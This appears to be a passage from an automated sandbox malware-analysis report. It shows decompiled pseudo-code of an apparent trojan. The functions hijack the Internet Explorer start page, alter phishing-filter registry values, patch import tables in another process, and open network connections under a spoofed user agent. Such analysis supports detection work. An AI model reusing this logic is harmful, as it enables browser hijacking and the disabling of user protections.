    				_t14 =  *0x416c34; // 0x25df5a8
    				_t4 = _t14 + 0x2c; // 0x25df908
    				return E0040B37A(0,  *_t4, 0xe, 0, 0, 0, 0);
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 0040C049
    • SetThreadPriority.KERNEL32(00000000,?,00408052), ref: 0040C050
    • SHDeleteKeyA.SHLWAPI(80000001,025DF739,?,00408052), ref: 0040C063
    • SHDeleteKeyA.SHLWAPI(80000002,025DF739,?,00408052), ref: 0040C077
    • SHDeleteKeyA.SHLWAPI(80000002,025DF979,?,00408052), ref: 0040C086
    • Sleep.KERNEL32(000003E8,?,00408052), ref: 0040C091
      • Part of subcall function 0040B37A: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040B3CF
      • Part of subcall function 0040B37A: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040B3EA
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,025DF908,00000004,00000002,00000000,?,?,00000000), ref: 0040B406
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B41F
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040B439
      • Part of subcall function 0040B37A: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040B452
      • Part of subcall function 0040B37A: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B46F
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$DeleteWrite$ReadThread$CreateCurrentHandleNamedPipePrioritySleepState
    • String ID:
    • API String ID: 2160410962-0
    • Opcode ID: c4ae525aca6752377e3477fbe9c36b60e04d974f51fd5e05b2ec3d0d45f4112b
    • Instruction ID: 4c33f71e6525441c575576b2bfae318ad90d4fb1b122247d94e0d21d22c115b9
    • Opcode Fuzzy Hash: c4ae525aca6752377e3477fbe9c36b60e04d974f51fd5e05b2ec3d0d45f4112b
    • Instruction Fuzzy Hash: FCF0DA76202510EFD7116BB8FE09ED97B78EB08311B038160FA05D6171DB71C840CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040F99D(signed int __eax, char* __ecx) {
    				short _v28;
    				char* _v32;
    				signed int _t5;
    				void* _t12;
    				void* _t14;
    				char* _t15;
    				void* _t17;
    
    				_t15 = __ecx;
    				_t5 = __eax;
    				if(__ecx == 0) {
    					_t15 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
    				}
    				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
    				if(_t14 == 0) {
    					L7:
    					return 0;
    				}
    				_t17 = 0;
    				do {
    					_t1 = _t17 + 0x41600c; // 0x41600c
    					_t2 = _t17 +  &E00416008; // 0x2
    					InternetSetOptionA(_t14,  *_t2, _t1, 4);
    					_t17 = _t17 + 8;
    				} while (_t17 < 0x18);
    				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
    				if(_t12 == 0) {
    					InternetCloseHandle(_t14);
    					goto L7;
    				}
    				return _t12;
    			}

    APIs
    • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 0040F9B4
    • InternetSetOptionA.WININET(00000000,00000002,0041600C,00000004), ref: 0040F9D3
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F9F0
    • InternetCloseHandle.WININET(00000000), ref: 0040F9FC
    Strings
    • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 0040F9A5, 0040F9B3
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Internet$CloseConnectHandleOpenOption
    • String ID: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    • API String ID: 910987326-2068255511
    • Opcode ID: 6d299cd18d7c59ad5331e84cf228f0a9d2220adb465006bdc821a976e1cd560d
    • Instruction ID: bbd4bdda369113f68dd0983876b4092ad58bbd27ea3dd6fc07a5e35f6ed57529
    • Opcode Fuzzy Hash: 6d299cd18d7c59ad5331e84cf228f0a9d2220adb465006bdc821a976e1cd560d
    • Instruction Fuzzy Hash: 86F090B2202230BBD73157619C8CDEBAE5DFF8D7A4B028536F659E1091C639C95487F8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E0040FDA0() {
    				char _v8;
    				struct HINSTANCE__* _v12;
    				void* _v1036;
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t15;
    				char _t22;
    				void* _t28;
    
    				_t22 = 0;
    				_t13 = LoadLibraryA("urlmon.dll");
    				_v12 = _t13;
    				if(_t13 != 0) {
    					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
    					if(_t15 != 0) {
    						_push( &_v8);
    						_push( &_v1036);
    						_push(0);
    						_v8 = 0x3ff;
    						_v1036 = 0;
    						if( *_t15() == 0) {
    							if(_v8 > 0x3ff) {
    								_v8 = 0x3ff;
    							}
    							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
    							_t22 = E0040F244( &_v1036 | 0xffffffff,  &_v1036);
    						}
    					}
    					FreeLibrary(_v12);
    				}
    				return _t22;
    			}

    APIs
    • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040FDB1
    • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040FDC4
    • FreeLibrary.KERNEL32(?), ref: 0040FE16
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID: ObtainUserAgentString$urlmon.dll
    • API String ID: 145871493-2685262326
    • Opcode ID: 59002cdd6b136f7c978a6f48142f00abbf8de6bacfef854dba2bf7f4d857cec6
    • Instruction ID: 75c3523cd69fe1abaae31290556416b9431b5aa668fa1441dd3134aa1927a074
    • Opcode Fuzzy Hash: 59002cdd6b136f7c978a6f48142f00abbf8de6bacfef854dba2bf7f4d857cec6
    • Instruction Fuzzy Hash: CF0188B5900254ABCB20ABE8DD849DE7BB8AB04300F2041BEA611F3291D6748F48CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040811E(void* __ecx, char* _a4, int _a8) {
    				void* _v8;
    				int _t13;
    
    				_t13 = 0;
    				_v8 = 0x80000001;
    				if(RegCreateKeyExA(0x80000001, "software\\microsoft\\internet explorer\\main", 0, 0, 0, 2, 0,  &_v8, 0) == 0) {
    					if(RegSetValueExA(_v8, "Start Page", 0, 1, _a4, _a8) == 0) {
    						_t13 = 1;
    					}
    					RegCloseKey(_v8);
    				}
    				return _t13;
    			}

    APIs
    • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\internet explorer\main,00000000,00000000,00000000,00000002,00000000,?,00000000,00000001,?,?,00405940,?,00000000,00000001), ref: 0040813E
    • RegSetValueExA.ADVAPI32(?,Start Page,00000000,00000001,?,?,?,?,00405940,?,00000000,00000001,!!!0-0=9-0=23434,?,00000001,3709128dk0023444), ref: 00408159
    • RegCloseKey.ADVAPI32(?,?,?,00405940,?,00000000,00000001,!!!0-0=9-0=23434,?,00000001,3709128dk0023444,00000001,09ck_=ldfuihpfre), ref: 00408168
    Strings
    • software\microsoft\internet explorer\main, xrefs: 00408135
    • Start Page, xrefs: 00408151
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateValue
    • String ID: Start Page$software\microsoft\internet explorer\main
    • API String ID: 1818849710-2333123338
    • Opcode ID: 13f3a19d53cacf50d6b9452804b44b47a7c16c19775eb956d6cb6ec894bcd59b
    • Instruction ID: 4234741d7cd6faba5f5c0ea56d521b5cca715f4bdd2c245c6b6784791d141544
    • Opcode Fuzzy Hash: 13f3a19d53cacf50d6b9452804b44b47a7c16c19775eb956d6cb6ec894bcd59b
    • Instruction Fuzzy Hash: 5DF082B1240208BFEF114FA1CD8AFDF7A6EEB14784F108026B545B5190EAB69E109624
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004122A1(void* _a4, short* _a8, char* _a12) {
    				int _t12;
    
    				_t12 = 0;
    				if(RegCreateKeyExW(_a4, L"software\\microsoft\\internet explorer\\phishingfilter", 0, 0, 0, 2, 0,  &_a4, 0) == 0) {
    					if(RegSetValueExW(_a4, _a8, 0, 4, _a12, 4) == 0) {
    						_t12 = 1;
    					}
    					RegCloseKey(_a4);
    				}
    				return _t12;
    			}

    APIs
    • RegCreateKeyExW.ADVAPI32(?,software\microsoft\internet explorer\phishingfilter,00000000,00000000,00000000,00000002,00000000,?,00000000,Enabled,?,00412252,?,?,00000000), ref: 004122BA
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00412252,?,?,00000000,?,?,0040D74F,80000002,EnabledV8), ref: 004122D2
    • RegCloseKey.ADVAPI32(?,?,00412252,?,?,00000000,?,?,0040D74F,80000002,EnabledV8,80000002,EnabledV8,80000002,Enabled,80000001), ref: 004122E1
    Strings
    • Enabled, xrefs: 004122A4
    • software\microsoft\internet explorer\phishingfilter, xrefs: 004122B2
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateValue
    • String ID: Enabled$software\microsoft\internet explorer\phishingfilter
    • API String ID: 1818849710-3174912645
    • Opcode ID: bde377fcddaba3b1e3b4744389d5b2b07b14058f5f5ae0935b499ac6792870b3
    • Instruction ID: 8b3b5b3a29cfe43f16c7ae286cee3f57a17c1e910cbdde6df11055293b966cc3
    • Opcode Fuzzy Hash: bde377fcddaba3b1e3b4744389d5b2b07b14058f5f5ae0935b499ac6792870b3
    • Instruction Fuzzy Hash: 69F0C0B124120DBFFB114F50DC85FEB7B6DEB10798F018026FA4895160E672DDA1AA68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00412256(void* _a4, short* _a8, int* _a12, char* _a16, int* _a20) {
    				int _t14;
    
    				_t14 = 0;
    				if(RegOpenKeyExW(_a4, L"software\\microsoft\\internet explorer\\phishingfilter", 0, 1,  &_a4) == 0) {
    					if(RegQueryValueExW(_a4, _a8, 0, _a12, _a16, _a20) == 0) {
    						_t14 = 1;
    					}
    					RegCloseKey(_a4);
    				}
    				return _t14;
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(00000004,software\microsoft\internet explorer\phishingfilter,00000000,00000001,00000004,Enabled,?,00412220,00000004,?,?,00000000,?), ref: 0041226B
    • RegQueryValueExW.ADVAPI32(00000004,?,00000000,?,80000001,0040D704,?,00412220,00000004,?,?,00000000,?), ref: 00412285
    • RegCloseKey.ADVAPI32(00000004,?,00412220,00000004,?,?,00000000,?,?,?,?,0040D704,80000001,Enabled), ref: 00412294
    Strings
    • Enabled, xrefs: 00412259
    • software\microsoft\internet explorer\phishingfilter, xrefs: 00412263
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseOpenQueryValue
    • String ID: Enabled$software\microsoft\internet explorer\phishingfilter
    • API String ID: 3677997916-3174912645
    • Opcode ID: e7d5a1c0cc2566cfaa9f97342214b6649dc028dfc0f2d26adf4cc8dddd368b78
    • Instruction ID: 6689faaf5ff8c86c45ad493251af6b612e9a6c51ca5c6135f26ccca265c6ef9b
    • Opcode Fuzzy Hash: e7d5a1c0cc2566cfaa9f97342214b6649dc028dfc0f2d26adf4cc8dddd368b78
    • Instruction Fuzzy Hash: EFF0C03124121DBFEF014F91DD45EDA3F6DFB14785B008026FD4995120E772D971AB94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 57%
    			E004066BC(void* __ecx, void* __edx, signed int* _a4) {
    				void* __edi;
    				void* __esi;
    				void** _t13;
    				intOrPtr _t16;
    				void* _t17;
    				char* _t19;
    				void* _t23;
    				void* _t28;
    				void* _t31;
    				intOrPtr _t34;
    				intOrPtr _t37;
    				void* _t43;
    				signed int* _t45;
    
    				_t41 = __ecx;
    				_t43 = __edx;
    				if(__ecx == 1) {
    					 *_a4 =  *_a4 & 0x00000000;
    					return 0x1020702;
    				}
    				__eflags = __ecx - 2;
    				if(__ecx != 2) {
    					__eflags = __ecx - 3;
    					if(__ecx != 3) {
    						__eflags = __ecx - 4;
    						if(__ecx != 4) {
    							__eflags = __ecx - 5;
    							if(__ecx != 5) {
    								__eflags = __ecx - 6;
    								if(__ecx != 6) {
    									__eflags = __ecx - 7;
    									if(__ecx != 7) {
    										__eflags = __ecx - 8;
    										if(__ecx != 8) {
    											__eflags = __ecx - 0xa;
    											if(__ecx != 0xa) {
    												__eflags = __ecx - 9;
    												if(__ecx != 9) {
    													__eflags = __ecx - 0xb;
    													if(__eflags != 0) {
    														__eflags = __ecx - 0xc;
    														if(__eflags != 0) {
    															__eflags = __ecx - 0xd;
    															if(__eflags != 0) {
    																__eflags = __ecx - 0xe;
    																if(__ecx != 0xe) {
    																	L6:
    																	_t13 = _a4;
    																	 *_t13 =  *_t13 & 0x00000000;
    																	__eflags =  *_t13;
    																	L7:
    																	__eflags = 0;
    																	return 0;
    																}
    																 *_a4 =  *_a4 & 0x00000000;
    																_t16 =  *0x416c34; // 0x25df5a8
    																_t12 = _t16 + 0x68; // 0x25dfba1
    																_t17 = GetProcAddress( *0x416e28,  *_t12);
    																__eflags = _t17;
    																if(_t17 != 0) {
    																	 *_t17(0x8007);
    																}
    																 *((intOrPtr*)(0)) = 0;
    																_t19 = 0;
    																__eflags = 0;
    																L38:
    																 *_t19 = 0;
    																_t19 = _t19 + 1;
    																goto L38;
    															}
    															_push( *0x4167c4);
    															L33:
    															E00406690(_t43, _a4, __eflags);
    															goto L7;
    														}
    														_push( *0x4167c0);
    														goto L33;
    													}
    													_push(0x4167d0);
    													goto L33;
    												}
    												 *_a4 =  *_a4 & 0x00000000;
    												_t23 =  *0x4169d8; // 0x0
    												__eflags = _t23;
    												if(_t23 != 0) {
    													CloseHandle(_t23);
    													 *0x4169d8 =  *0x4169d8 & 0x00000000;
    												}
    												goto L7;
    											}
    											_push(0x4167d0);
    											_t45 = 0x4169d8;
    											L23:
    											 *_a4 =  *_a4 & 0x00000000;
    											E0040664A(_t41, _t45);
    											goto L7;
    										}
    										 *_a4 =  *_a4 & 0x00000000;
    										_t28 =  *0x4169dc; // 0x0
    										__eflags = _t28;
    										if(_t28 != 0) {
    											CloseHandle(_t28);
    											 *0x4169dc =  *0x4169dc & 0x00000000;
    										}
    										goto L7;
    									}
    									_push( *0x4167c4);
    									_t45 = 0x4169dc;
    									goto L23;
    								}
    								 *_a4 =  *_a4 & 0x00000000;
    								_t31 =  *0x4167cc; // 0x0
    								__eflags = _t31;
    								if(_t31 != 0) {
    									CloseHandle(_t31);
    									 *0x4167cc =  *0x4167cc & 0x00000000;
    								}
    								goto L7;
    							}
    							_push( *0x4167c0);
    							_t45 = 0x4167cc;
    							goto L23;
    						}
    						 *_a4 =  *_a4 & 0x00000000;
    						_t34 =  *0x416d78; // 0x12fc
    						return _t34;
    					}
    					SetEvent( *0x4167c8);
    					goto L6;
    				} else {
    					 *_a4 =  *_a4 & 0x00000000;
    					_t37 =  *0x416c64; // 0x41b000
    					_t3 = _t37 + 8; // 0x0
    					return  *_t3;
    				}
    			}

    APIs
    • CloseHandle.KERNEL32(00000000), ref: 00406742
    • CloseHandle.KERNEL32(00000000), ref: 00406778
    • CloseHandle.KERNEL32(00000000), ref: 004067C2
    • GetProcAddress.KERNELBASE(025DFBA1), ref: 00406822
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$AddressProc
    • String ID:
    • API String ID: 4209786425-0
    • Opcode ID: e1aeb340a8536d396eda43a2c093094522188c10f09b03ba90bd26e233cc8a77
    • Instruction ID: 48194baf6da5a5be848e876737b62aa9ebee81e234beece6df1afaa065cd7e52
    • Opcode Fuzzy Hash: e1aeb340a8536d396eda43a2c093094522188c10f09b03ba90bd26e233cc8a77
    • Instruction Fuzzy Hash: CF416C31510201DFDB118F54D890BA637A4EB01369F23803BE507AB6E0C77ADCA19B6E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E00407411(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, char _a16, char _a20) {
    				long _v8;
    				void* __edi;
    				intOrPtr* _t24;
    				intOrPtr _t25;
    				signed short _t26;
    				int _t27;
    				signed short _t28;
    				intOrPtr* _t29;
    				signed short _t31;
    				int _t32;
    				signed short _t34;
    				signed short _t37;
    				void* _t42;
    				signed int _t48;
    				void* _t57;
    
    				_t48 = __edx;
    				_push(__ecx);
    				_v8 = _v8 & 0x00000000;
    				_t24 = _a8;
    				if(_a16 != 2) {
    					_t25 =  *_t24;
    				} else {
    					_t25 =  *((intOrPtr*)(_t24 + 0x10));
    				}
    				if(_t25 != 0) {
    					_t42 = _t25 + _a4;
    					_t26 = IsBadHugeReadPtr(_t42, 4);
    					__eflags = _t26;
    					if(_t26 == 0) {
    						while(1) {
    							_t31 =  *_t42;
    							__eflags = _t31;
    							if(_t31 == 0) {
    								break;
    							}
    							__eflags = _a16 - 2;
    							if(_a16 != 2) {
    								__eflags = _a16;
    								if(_a16 != 0) {
    									__eflags = _a16 - 1;
    									if(_a16 != 1) {
    										goto L18;
    									} else {
    										__eflags = _t31;
    										if(_t31 < 0) {
    											goto L18;
    										} else {
    											_t57 = _t31 + _a4;
    											_t34 = VirtualProtectEx( *0x416bbc, _t57, 4, 0x40,  &_v8);
    											__eflags = _t34;
    											if(_t34 == 0) {
    												goto L18;
    											} else {
    												_t17 = _t57 + 2; // 0x2
    												_t48 = _t48 | 0xffffffff;
    												_t37 = E0040F547(_t48, _a12, _t48, _t17);
    												VirtualProtectEx( *0x416bbc, _t57, 4, _v8,  &_v8);
    												__eflags = _t37;
    												goto L17;
    											}
    										}
    									}
    								} else {
    									__eflags = _t31;
    									if(_t31 >= 0) {
    										goto L18;
    									} else {
    										__eflags = _a12 - (_t31 & 0x0000ffff);
    										goto L17;
    									}
    								}
    							} else {
    								__eflags = _t31 - _a12;
    								L17:
    								if(__eflags != 0) {
    									L18:
    									_t42 = _t42 + 4;
    									_t32 = IsBadHugeReadPtr(_t42, 4);
    									__eflags = _t32;
    									if(_t32 == 0) {
    										continue;
    									}
    								}
    							}
    							break;
    						}
    					}
    					_t27 = IsBadHugeReadPtr(_t42, 4);
    					__eflags = _t27;
    					if(_t27 != 0) {
    						L26:
    						_t28 = 0;
    						__eflags = 0;
    					} else {
    						__eflags =  *_t42 - _t27;
    						if( *_t42 == _t27) {
    							goto L26;
    						} else {
    							__eflags = _a16 - 2;
    							if(_a16 != 2) {
    								_t29 = _a8;
    								_t53 =  *((intOrPtr*)(_t29 + 0x10)) -  *_t29 + _t42;
    								__eflags =  *((intOrPtr*)(_t29 + 0x10)) -  *_t29 + _t42;
    							} else {
    								_t53 = _t42;
    							}
    							_t28 = E0040727B(_t53,  &_a20);
    						}
    					}
    				} else {
    					_t28 = 0;
    				}
    				return _t28;
    			}

    APIs
    • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 0040743F
    • IsBadHugeReadPtr.KERNEL32(-00000004,00000004), ref: 004074D1
    • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 004074E3
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: HugeRead
    • String ID:
    • API String ID: 2080902951-0
    • Opcode ID: 3a9af85b8dc96e1ac3abd27f37662046b750632d6a60e6b38c3b28e0cc30a482
    • Instruction ID: f88d5b6430bdfd719cc8829ac7db07460b3388dbfe81a5f31416030077102ea4
    • Opcode Fuzzy Hash: 3a9af85b8dc96e1ac3abd27f37662046b750632d6a60e6b38c3b28e0cc30a482
    • Instruction Fuzzy Hash: B2317271A08205BBDF20CF24DC45B9B3BA8AB01358F11447AFA05A72D1D738F901D75A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0040CCAF(signed int __eax, void* __ebx, void* __edi) {
    				void* __esi;
    				signed char _t40;
    				signed int _t41;
    				void* _t45;
    				void* _t62;
    				void* _t63;
    				signed int _t65;
    				void* _t69;
    				void* _t70;
    				signed char* _t74;
    
    				_t69 = __edi;
    				_t62 = __ebx;
    				_t74 = __eax * 0x30 +  *0x417024;
    				if(( *_t74 & 0x00000001) != 0) {
    					WaitForSingleObject(_t74[0x14], 0xffffffff);
    					CloseHandle(_t74[0x14]);
    				}
    				_push(_t62);
    				_t63 = 0;
    				if(_t74[0x28] > 0) {
    					_push(_t69);
    					_t70 = 0;
    					do {
    						E0040F0C0( *((intOrPtr*)(_t74[0x24] + _t70 + 4)));
    						E0040F0C0( *((intOrPtr*)(_t74[0x24] + _t70 + 0xc)));
    						E0040F0C0( *((intOrPtr*)(_t74[0x24] + _t70 + 0x10)));
    						E0040F0C0( *((intOrPtr*)(_t74[0x24] + _t70 + 0x14)));
    						_t63 = _t63 + 1;
    						_t70 = _t70 + 0x18;
    					} while (_t63 < _t74[0x28]);
    				}
    				E0040F0C0(_t74[0x18]);
    				E0040F0C0(_t74[0x24]);
    				if(( *_t74 & 0x00000002) != 0) {
    					InternetCloseHandle(_t74[0x10]);
    					InternetCloseHandle(_t74[0xc]);
    					InternetCloseHandle(_t74[8]);
    				}
    				_t40 =  *_t74;
    				if((_t40 & 0x0000000c) != 0) {
    					if((_t40 & 0x00000008) != 0) {
    						_t47 = _t74[0x2c];
    						if(_t74[0x2c] != 0) {
    							E0040F0C0( *((intOrPtr*)(_t47 + 0x14)));
    						}
    					}
    					E0040F0C0(_t74[0x2c]);
    				}
    				_t41 =  *0x417020; // 0x0
    				_t74[4] = _t74[4] & 0x00000000;
    				if(_t41 <= 0) {
    					L18:
    					return _t41;
    				} else {
    					_t65 =  *0x417024; // 0x0
    					if(_t74 != _t41 * 0x30 + _t65 - 0x30) {
    						goto L18;
    					} else {
    						if(_t41 != 1) {
    							_t42 = _t41 - 1;
    							 *0x417020 = _t41 - 1;
    							return E0040F053(_t42 * 0x30, 0x417024);
    						}
    						_t45 = E0040F0C0(_t65);
    						 *0x417024 =  *0x417024 & 0x00000000;
    						 *0x417020 =  *0x417020 & 0x00000000;
    						return _t45;
    					}
    				}
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,?,0040E5F5), ref: 0040CCC5
    • CloseHandle.KERNEL32(?), ref: 0040CCCE
    • InternetCloseHandle.WININET(?), ref: 0040CD32
    • InternetCloseHandle.WININET(?), ref: 0040CD3B
    • InternetCloseHandle.WININET(?), ref: 0040CD44
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$Internet$ObjectSingleWait
    • String ID:
    • API String ID: 2916869018-0
    • Opcode ID: a2848622eef05c504f108aa018359c93a96dffbb54e4c99702863a87d9d8b5df
    • Instruction ID: 77f27aa971988fef1b3aaac74bb1410e51ad1408d72d29d96a45137fea876343
    • Opcode Fuzzy Hash: a2848622eef05c504f108aa018359c93a96dffbb54e4c99702863a87d9d8b5df
    • Instruction Fuzzy Hash: 71316D32514701DFC730AF25ED85A46BBF2AF08714B018A3FE556A6AF2D735E844CB88
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004088AE() {
    				long _v4;
    				struct HWND__* _t2;
    				struct HWND__* _t3;
    				struct HWND__* _t8;
    				struct HWND__* _t10;
    
    				_t2 = GetTopWindow(_t8);
    				_t10 = _t2;
    				if(_t10 == 0) {
    					L6:
    					return _t2;
    				}
    				_t3 = GetWindow(_t10, 1);
    				if(_t3 != 0) {
    					_t10 = _t3;
    				}
    				do {
    					if(IsWindowVisible(_t10) != 0) {
    						SendMessageTimeoutW(_t10,  *0x416a10, 0, 0, 3, 0x12c,  &_v4);
    					}
    					E004088AE();
    					_t2 = GetWindow(_t10, 3);
    					_t10 = _t2;
    				} while (_t10 != 0);
    				goto L6;
    			}

    APIs
    • GetTopWindow.USER32 ref: 004088B1
    • GetWindow.USER32(00000000,00000001), ref: 004088C0
    • IsWindowVisible.USER32(00000000), ref: 004088CD
    • SendMessageTimeoutW.USER32(00000000,00000000,00000000,00000003,0000012C,?), ref: 004088EE
    • GetWindow.USER32(00000000,00000003), ref: 004088FE
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Window$MessageSendTimeoutVisible
    • String ID:
    • API String ID: 3425020583-0
    • Opcode ID: 4d5fa724254a0be4908873dd8804c3516ccf0e29da3a39c77e9a22441ec3923b
    • Instruction ID: fbe8ab7ee87c69692b9a327b7dcaaafe8f934ea7b5899c9ba5bf8c9eaac708e1
    • Opcode Fuzzy Hash: 4d5fa724254a0be4908873dd8804c3516ccf0e29da3a39c77e9a22441ec3923b
    • Instruction Fuzzy Hash: 3FF05E727416317BE6322720AD09FAB2A99AF05B51F068139F941F52D4DF78ED008AED
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B300(void** __esi, intOrPtr _a4) {
    				void* _t7;
    
    				_t18 = __esi;
    				if(__esi != 0) {
    					SetEvent(__esi[1]);
    					E0040B37A(_t18, _a4, 0, 0, 0, 0, 0);
    					WaitForSingleObject(__esi[2], 0xffffffff);
    					CloseHandle( *__esi);
    					CloseHandle(__esi[1]);
    					CloseHandle(__esi[2]);
    					E0040F0C0(__esi[4]);
    					return E0040F0C0(__esi);
    				}
    				return _t7;
    			}

    APIs
    • SetEvent.KERNEL32(?,00000000,0040AA84,025DF8E0), ref: 0040B30A
      • Part of subcall function 0040B37A: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040B3CF
      • Part of subcall function 0040B37A: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040B3EA
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,025DF908,00000004,00000002,00000000,?,?,00000000), ref: 0040B406
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B41F
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040B439
      • Part of subcall function 0040B37A: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040B452
      • Part of subcall function 0040B37A: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B46F
    • WaitForSingleObject.KERNEL32(?,000000FF,0000EA60,00000000,00000000,00000000,00000000,00000000), ref: 0040B323
    • CloseHandle.KERNEL32(00000000), ref: 0040B32B
    • CloseHandle.KERNEL32(?), ref: 0040B334
    • CloseHandle.KERNEL32(?), ref: 0040B33D
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Handle$CloseWrite$Read$CreateEventFreeHeapNamedObjectPipeSingleStateWait
    • String ID:
    • API String ID: 998100866-0
    • Opcode ID: a2778cabd55aa83e5535e8b720a9038d03f3f1182c2b2600243a22a11380d0dc
    • Instruction ID: 0a37717a109ce5986a01dab689cfbcfa5780f6383f880f5966c77ab8c2a5044a
    • Opcode Fuzzy Hash: a2778cabd55aa83e5535e8b720a9038d03f3f1182c2b2600243a22a11380d0dc
    • Instruction Fuzzy Hash: 67E0C036000611EBCB322F65EC0998BBA72FF44711316863DF576608B5CB359451DB4C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040D6EA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a16, intOrPtr _a20) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr _v16;
    				struct _SYSTEMTIME _v32;
    				char _v48;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t71;
    				signed int _t74;
    				signed int _t78;
    				signed int _t84;
    				signed int _t85;
    				signed short _t89;
    				signed int _t90;
    				intOrPtr _t93;
    				void* _t108;
    				signed int* _t123;
    				void* _t129;
    				void* _t131;
    				intOrPtr* _t135;
    				intOrPtr _t136;
    				signed int _t137;
    
    				_t129 = __edx;
    				_t126 = __ecx;
    				_t119 = L"Enabled";
    				if(E004121F9(__ecx, 0x80000001, L"Enabled") != 0) {
    					E0041223B(__ecx, 0x80000001, L"Enabled");
    				}
    				_t130 = L"EnabledV8";
    				if(E004121F9(_t126, 0x80000001, L"EnabledV8") != 0) {
    					E0041223B(_t126, 0x80000001, L"EnabledV8");
    				}
    				if(E004121F9(_t126, 0x80000002, _t119) != 0) {
    					E0041223B(_t126, 0x80000002, _t119);
    				}
    				if(E004121F9(_t126, 0x80000002, _t130) != 0) {
